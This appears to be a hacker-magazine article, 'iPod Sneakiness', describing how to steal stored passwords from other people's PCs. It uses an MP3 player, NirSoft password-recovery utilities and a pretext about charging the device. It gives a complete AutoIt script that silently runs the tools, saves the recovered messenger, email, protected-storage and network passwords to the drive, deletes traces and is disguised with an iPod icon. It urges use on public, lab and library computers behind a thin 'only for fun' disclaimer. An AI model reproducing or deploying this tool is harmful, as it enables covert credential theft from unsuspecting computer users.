iPod Sneakiness
by Rob
"My iPod's dying. Mind if I plug it into your PC for a second to charge up?"
With those simple words, you can have some serious fun. You need only two things: a MP3 player that functions as an USB device and a little knowledge of a scripting language. I use AutoIt.
Here's what to do: Grab a couple of programs from nirsoft.net. These were reviewed in 2600 earlier this year.
The ones I use are:
MessenPass (www.nirsoft.net/utils/mspass.html) - Recovers the passwords of instant messenger programs like Yahoo! Messenger, MSN Messenger, Trillian, and more.
Mail PassView (www.nirsoft.net/utils/mailpv.html) - Recovers the passwords of popular email clients like Outlook Express, Outlook, Eudora, Mozilla Thunderbird, and more.
Protected Storage PassView (www.nirsoft.net/utils/pspv.html) - Displays all passwords and AutoComplete strings stored in your Protected Storage.
Network Password Recovery (www.nirsoft.net/utils/network_password_recovery.html) - Freeware utility that recovers the network passwords stored by Windows XP.
There is also a key finder and a history browser, if that's your thing. Put all of those programs into a folder on your MP3 player/USB device and get scripting. The script I wrote runs all four programs silently, dumps the results to textfiles on the USB drive, creates one master text file with a name correlating to the date time stamp of when I ran it, then deletes the extraneous files. I use the timestamp as a name. That way I can run it multiple times on different PCs without having to move files.
With AutoIt, I compiled the script to an EXE and assigned it an iPod icon. You can use any icon you think would be non-obvious. It's silent, opens no windows, and takes about four seconds to run.
Run this on a public PC, at your computer lab, or at your library and you will be amazed at the amount of passwords and stored information you come away with.
Now I should warn you, this is only for fun, only to laugh at people who save their info on public PCs, not for hacking or anything malicious.
Enjoy.
The script follows:
Run(@ComSpec & ' /k "..\\Password\\Software\\pspv.exe /stext..\\Password\\new\\pspv.txt"', @ScriptDir, @SW_HIDE) sleep(200) Run(@ComSpec & ' /k "..\\Password\\Software\\im.exe /stext..\\Password\\new\\im.txt"', @ScriptDir, @SW_HIDE) sleep(200) Run(@ComSpec & ' /k "..\\Password\\Software\\mail.exe /stext..\\Password\\new\\mail.txt"', @ScriptDir, @SW_HIDE) sleep(200) Run(@ComSpec & ' /k "..\\Password\\Software\\network.exe /stext..\\Password\\new\\network.txt"', @ScriptDir, @SW_HIDE) sleep(3000) Run(@ComSpec & ' /k "COPY..\\Password\\new\\*.txt ..\\Password\\new\\all.txt"', sleep(3000) Dim $DateTime = @YEAR & "-" & @MON & "-" & @MDAY & " " & @HOUR & "-" & @MIN & "-" & @SEC Dim $Location = @WorkingDir & '\\new\\' Dim $Filename = "all.txt" FileMove($Location & $Filename , $Location & $DateTime & ".log",1) sleep(3000) Run(@ComSpec & ' /k "del ..\\Password\\new\\*.txt"', @ScriptDir, @SW_HIDE) sleep(1000)Code: ipod-sneakiness.au3